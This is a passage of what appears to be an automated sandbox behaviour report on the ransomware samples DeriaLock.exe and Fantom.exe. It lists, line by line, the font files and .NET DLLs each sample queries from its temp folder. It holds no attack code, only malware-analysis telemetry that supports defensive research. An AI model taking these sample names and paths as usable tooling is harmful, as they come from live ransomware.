        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
